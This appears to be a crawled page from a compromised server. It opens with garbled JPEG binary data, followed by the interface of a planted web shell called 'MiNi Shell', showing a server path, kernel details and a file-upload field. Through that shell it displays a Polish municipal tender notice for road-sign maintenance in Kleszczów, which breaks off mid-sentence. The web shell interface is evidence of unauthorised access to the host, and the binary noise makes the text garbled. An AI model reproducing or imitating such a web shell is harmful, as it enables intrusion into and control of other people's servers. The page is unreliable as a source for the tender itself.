JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230928/0041913501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Bieżące utrzymanie oznakowania dróg gminnych i powiatowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kleszczów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590647983</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Główna 47</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kleszczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-410</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia-publiczne@kleszczow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kleszczow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżące utrzymanie oznakowania dróg gminnych i powiatowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f47e54da-5df3-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00419135</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00065016/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Bieżące utrzymanie oznakowania dróg gminnych i powiatowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zp.kleszczow.pl/procurements <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-zp.kleszczow.pl/procurements</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>dotyczące korespondencji elektronicznej, a także szczegółowy opis sposobu komunikacji, składania ofert, oświadczeń i dokumentów elektronicznych (formy dokumentów) określono w pkt 18 SWZ dostępnej pod adresem https://e-zp.kleszczow.pl/procurements, numer/znak sprawy: ZPF.271.18.2023.<br/>Zamawiający wskazuje w szczególności:<br/>1.Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej;<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Systemu E-Zamówienia Publiczne (dalej jako: e-ZP/system e-ZP) https://e-zp.kleszczow.pl/procurements lub poczty elektronicznej, adres email: zamowienia-publiczne@kleszczow.pl ;<br/>3.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto w Systemie eZP;<br/>4.W Systemie E-ZP znajduje się także instrukcja dla Wykonawcy (Instrukcja obsługi Systemu FINN e-Zamówienia Publiczne) oraz filmy instruktażowe - prezentujące podstawowe czynności dokonywane przez Wykonawców za pomocą Systemu (rejestracja, zadawanie pytań, złożenie oferty, wycofanie oferty). Instrukcja dostępna jest pod adresem: https://pomoc.e-zp.finn.pl/<br/>5.Złożenie oferty poprzez System e-ZP wymaga posiadania przez Wykonawcę kwalifikowanego podpisu elektronicznego lub podpisu osobistego lub podpisu zaufanego.<br/>6.Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych Systemu E-ZP:<br/>a. Format kodowania treści w obrębie Systemu - UTF8,<br/>b. Komunikacja pomiędzy przeglądarką Wykonawcy, a serwerem jest wykonywana przy użyciu bezpiecznego protokołu HTTPS,<br/>c. Oznaczeniem czasu odbioru danych przez System jest data oraz dokładny czas (hh:mm:ss) -<br/>czas lokalny serwera synchronizowany odpowiednim źródłem czasu.<br/>7.Wymagania techniczne związane z korzystaniem z Systemu (tj. informacje dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu przekazania danych):<br/>a. stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza<br/>niż 512 kb/s;<br/>b. zaktualizowana przeglądarka internetowa Chrome w wersji 77 i późniejsze lub Mozilla Firefox w wersji 63 i późniejsze;<br/>c. system operacyjny Microsoft Windows 7 i późniejsze lub Apple macOS 10.14 i późniejsze, dystrybucje systemu Linux.<br/>d. korzystanie z wbudowanej w System e-ZP funkcjonalności składania podpisu elektronicznego (kwalifikowany podpis elektroniczny, osobisty i zaufany) możliwe jest pod warunkiem, że system teleinformatyczny, z którego korzysta Wykonawca, wyposażony jest w jeden z poniższych komponentów: - wirtualna maszyna Java firmy Oracle w wersji co najmniej 1.8.0_221 (Java<br/>SE JRE 8 Update 221) z obsługą technologii Java Web Start (JavaWS) lub -wirtualna maszyna OpenJDK w wersji co najmniej 1.8.0_222 z zainstalowanym rozszerzeniem IcedTea Web Start.<br/>8.Powyższe wymagania nie ograniczają możliwości korzystania przez Wykonawcę z zewnętrznego oprogramowania do składania podpisu elektronicznego,<br/>a. kwalifikowany podpis elektroniczny (dopuszczalne formaty podpisów: PaDES - format.pdf, XaDES - pozostałe formaty);<br/>b. podpis zaufany;<br/>c. certyfikat osobisty;<br/>d. dopuszczalne formaty danych, w szczególności: .txt, .pdf, .xls, .doc,.docx, .rtf, .odt, .zip, .xml, .rar (zalecany .pdf);<br/>e. Maksymalny rozmiar przesyłanych plików złożenia, wycofania: oferty/ wniosku o dopuszczenie do udziału w postępowaniu/ oferty dodatkowej w trybie podstawowym/ oferty ostatecznej/ oferty dodatkowej oraz wiadomości wynosi 150 MB;<br/>f. w zakresie dotyczącym kodowania i czasu odbioru danych Zamawiający informuje, że złożona przez Wykonawcę za pomocą Systemu e-ZP oferta jest widoczna w systemie, jako zaszyfrowana, a możliwość jej odszyfrowania i otworzenia przez Zamawiającego możliwa jest po upływie terminu składania ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH a)<br/>Administratorem Pani/Pana danych osobowych jest Gmina Kleszczów, mająca swoją siedzibę w Urzędzie Gminy w Kleszczowie,<br/>przy ul. Głównej 47, 97-410 Kleszczów.<br/>b) Wyznaczyliśmy Inspektora ochrony danych, od którego można uzyskać więcej informacji o przetwarzaniu danych osobowych. Kontakt do Inspektora: e-mail: iod@kleszczow.pl, adres: Inspektor ochrony danych, ul. Główna 47, 97-410 Kleszczów.<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO w związku z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego ZPF.271.12.2023 prowadzonym w trybie podstawowym określonym w art. 275 pkt 1 ustawy Pzp.<br/>d) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp” oraz ustawy z dnia 6 września 2001 roku – o dostępie do informacji publicznej. <br/>e) Pani/Pana dane osobowe będą przetwarzane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przetwarzania obejmuje cały czas trwania umowy. Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji<br/>i zakresu działania archiwów zakładowych dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5 lat) natomiast umowa zawarta w wyniku postępowania w trybie zamówień publicznych posiada kategorię archiwalną B10 (okres przechowywania 10 lat).<br/>f) Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>g) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>h) Posiada Pani/Pan:<br/>− prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− prawo do sprostowania Pani/Pana danych osobowych;<br/>− prawo żądania ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 RODO, wymagałoby niewspółmiernie dużego wysiłku,<br/>zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania<br/>lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPF.271.18.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane w branży drogowej związane z bieżącym utrzymaniem oznakowania dróg publicznych gminnych i powiatowych oraz wewnętrznych których zarządcą jest Wójt Gminy Kleszczów w latach 2023-2024 w zakresie dochowania należytego stanu technicznego oznakowania pionowego i poziomego oraz urządzeń BRD. <br/>Roboty będą realizowane na drogach gminnych i powiatowych (powiatu Bełchatowskiego oraz Radomszczańskiego), administrowanych przez Gminę Kleszczów zgodnie z prawem własności, dysponowania oraz zawartymi porozumieniami na przejęcie dróg powiatowych w zarząd. <br/>W pierwszej kolejności Zamawiający zleci wymianę tarcz znaków które utraciły homologację oraz wymianę uszkodzonych punktowych elementów odblaskowych, tzw. „kocich oczek” typu ciężkiego.<br/>Łączna ilość dróg objętych utrzymaniem oznakowania wynosi 162,1 km w tym: <br/>• 90,1 kilometrów publicznych dróg gminnych, <br/>•	37 kilometrów dróg powiatowych (dla których z mocy zawartych porozumień Zarządcą jest Wójt Gminy Kleszczów)<br/>•	35 km gminnych dróg wewnętrznych<br/>Zakres umowy będzie obejmował w szczególności:<br/>•	dostawę i montaż/demontaż znaków drogowych pionowych, <br/>•	dostawę i montaż/demontaż konstrukcji wsporczych, <br/>•	demontaż i prostowanie znaków drogowych i tablic <br/>•	dostawę i montaż/demontaż ogrodzenia segmentowego, <br/>•	poprawę znaków w terenie, usuwanie zakrzaczeń, <br/>•	mycie znaków,<br/>•	dostawę i montaż/demontaż punktowych elementów odblaskowych,<br/>•	malowanie znaków poziomych,<br/>•	usuwanie znaków poziomych,<br/>•	wykonywanie projektów DOR wraz z zatwierdzeniem,<br/>•	dostawę i montaż/demontaż urządzeń BRD. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34922100-7 - Oznakowanie drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45316213-1 - Instalowanie oznakowania drogowego</p> <p class="mb-0">45233292-2 - Instalowanie urządzeń ochronnych</p> <p class="mb-0">45233150-5 - Roboty w zakresie regulacji ruchu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Formularz obliczenia ceny oferty, został podany w celu zapewnienia porównywalności ofert. Zakres zamówienia (wielkość świadczenia/ilość prac) nie będzie większy niż wynikający z Formularza obliczenia ceny oferty – jest to zakres maksymalny (ewentualne zwiększenia zakresu nie są objęte opcją). <br/>Zamawiający nie gwarantuje Wykonawcy, że wskazane w Formularzu obliczenia ceny oferty szacowane ilości prac nie ulegną zmniejszeniu w trakcie realizacji umowy. Zamawiający dopuszcza możliwość zmniejszenia przewidywanego zakresu prac, które to zmniejszenie zostanie przeliczone w oparciu o ceny jednostkowe wskazane w Formularzu obliczenia ceny oferty (z odpowiednim uwzględnieniem art. 632 § 2 ustawy Kodeks cywilny oraz klauzul waloryzacyjnych przewidzianych w umowie). Ilość prac (wg Formularza obliczenia ceny oferty) może zostać jednostronnie zmniejszona przez Zamawiającego, co nie wymaga aneksu do umowy. Dopuszcza się łączne jednostronne zmniejszenie przez zamawiającego ilości prac wskazanych w Formularzu obliczenia ceny oferty, które będzie odpowiadało równowartości maksymalnie 30% wartości brutto pierwotnej umowy wg cen z Formularza obliczenia ceny oferty z odpowiednim uwzględnieniem art. 632 § 2 ustawy Kodeks cywilny oraz klauzul waloryzacyjnych przewidzianych w umowie. Tym samym świadczenie wykonawcy w ramach umowy nie może być mniejsze niż 70% ceny oferty przy odpowiednim uwzględnieniu art. 632 § 2 ustawy Kodeks cywilny oraz klauzul waloryzacyjnych przewidzianych w umowie.<br/>Ewentualne zmniejszenie zakresu zamówienia będzie mogło nastąpić w zakresie jednej, lub kilku, lub wszystkich pozycji wyartykułowanych w Formularzu obliczenia ceny oferty (w zależności od potrzeb Zamawiającego). Okolicznością, w której ww. zmniejszenie może nastąpić są rzeczywiste potrzeby Zamawiającego, tzn. w przypadku, gdy faktyczne potrzeby związane z utrzymaniem, lub wykonaniem oznakowania dróg będą mniejsze niż przewidywane - Zamawiający będzie mógł skorzystać z prawa opcji. Zakres potrzeb będzie uwarunkowany stopniem degradacji oznakowania dróg jaki zaistnieje w terminie realizacji zamówienia, lub realną koniecznością wykonania, lub wymiany oznakowania.<br/>Przy ustaleniu wartości zamówienia uwzględniono największy możliwy zakres tego zamówienia. <br/>Opcja zmniejszenia zakresu zamówienia zgodnie z ww. regułami (niewymagająca pisemnego aneksu) jest uprawnieniem Zamawiającego, z którego może, ale nie musi on skorzystać.<br/>Wykonawcy nie przysługuje jakiekolwiek roszczenie wobec Zamawiającego z tytułu zmniejszenia przewidywanego zakresu prac .<br/>Zamawiający zastrzega możliwość wielokrotnego korzystania z prawa opcji - zmniejszania zakresu robót i wynagrodzenia z uwzględnieniem powyższych zasad.<br/>W przypadku zmniejszenia zakresu zamówienia, wynagrodzenie wykonawcy z tytułu realizacji zamówienia zostanie odpowiednio pomniejszone na podstawie cen jednostkowych wskazanych przez Wykonawcę w ofercie w sposób określony w pkt 24 SWZ (z odpowiednim uwzględnieniem art. 632 § 2 ustawy Kodeks cywilny oraz klauzul waloryzacyjnych przewidzianych w umowie).<br/>Zmniejszenie zakresu zamówienia następuje poprzez brak złożenia przez Zamawiającego pisemnego zlecenia, o którym mowa w pkt 3.4.-3.9. projektowanych postanowień umowy - załącznik do SWZ (wzór umowy). <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza oferta to oferta z najniższą ceną spośród ofert niepodlegających odrzuceniu na podstawie przesłanek określonych w art. 226 ust. 1 Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> INFORMACJA O WARUNKACH UDZIAŁU W POSTĘPOWANIU <br/>1.	Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa tego warunku.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa tego warunku.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa tego warunku.<br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>Minimalne poziomy zdolności w zakresie posiadanego doświadczenia:<br/>Zamawiający uzna, iż Wykonawca zdolny do należytego wykonania udzielanego zamówienia to taki, który wykonał należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie: <br/>a)	minimum jedną umowę, w ramach której Wykonawca zobowiązany był do świadczenia w postaci bieżącego utrzymania i/lub wykonania oznakowania pionowego dróg, którego wartość wyniosła minimum 40 000,00 zł brutto oraz<br/>b)	minimum jedną umowę, w ramach której Wykonawca zobowiązany był do świadczenia w postaci bieżącego utrzymania i/lub wykonania oznakowania poziomego dróg, którego wartość wyniosła minimum 20 000,00 zł brutto.<br/>Przez „drogę” należy rozumieć drogę publiczną, lub wewnętrzną przeznaczoną do ruchu pojazdów, o których mowa w ustawie z dnia 21 marca 1985 r. o drogach publicznych (t.j. Dz.U. z 2023 r., poz. 645 ze zm.) z wyłączeniem parkingów, placów oraz dróg wewnętrznych, o których mowa w art. 8 ust. 1 ze znaczkiem 1 ww. ustawy.<br/>Zamawiający bierze pod uwagę sytuację, że w odpowiednim stanie faktycznym, prace związane z wykonaniem oznakowania pionowego, lub poziomego nie były skategoryzowane jako roboty budowlane (tak jak jest to w niniejszym postępowaniu), lecz jako usługi, lub jako dostawy z montażem – dopuszcza się wykazanie tego warunku, również w przypadku, gdy zrealizowane prace były traktowane jako usługi, lub dostawy.<br/>Wykonawca jest uprawniony do wykazania spełnienia warunku w zakresie pkt 14.1.4 a) i b) SWZ w ramach odrębnych umów, o których mowa w pkt 14.1.4. a) i b) SWZ lub w ramach jednej umowy obejmującej zakres opisany w pkt 14.1.4 a) i b) SWZ (odpowiednio pkt 5.4.) 4) lit a) i b) ogłoszenia o zamówieniu).<br/>Zgodnie z orzeczeniem TSUE C-387/14 w sprawie ESAPROJEKT (odpowiedź na pytanie czwarte), Zamawiający wskazuje, że w przypadku Wykonawców wspólnie 